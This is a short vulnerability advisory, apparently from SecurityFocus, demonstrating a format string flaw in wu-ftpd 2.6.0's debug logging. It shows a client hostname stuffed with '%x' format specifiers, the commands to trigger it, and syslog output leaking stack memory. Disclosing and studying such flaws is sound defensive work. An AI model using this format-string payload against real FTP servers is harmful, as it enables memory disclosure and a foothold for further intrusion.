Wu-Ftpd Debug Mode Client Hostname Format String Vulnerability

The following example demonstrates the vulnerability.

Note: /etc/hosts is used as the example name resolving mechanism. Could be DNS, NIS, etc.


$ grep /etc/hosts %x%x%x%x%x%x%x%x%x%x

$ grep ftpd /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd /tmp/wuftpd-2.6.0/src/ftpd -v

$ ncftpget -F /tmp /usr/lib/ld.so

$ tail /var/log/syslog.debug

Jan 24 14:17:01 xxx ftpd[30912]: PASV port 47479 assigned to 80862b0806487eb9778084da87bffff16c9640151020bfffe108401c9004 []

..<snip extra output>..


Privacy Statement
Copyright 2010, SecurityFocus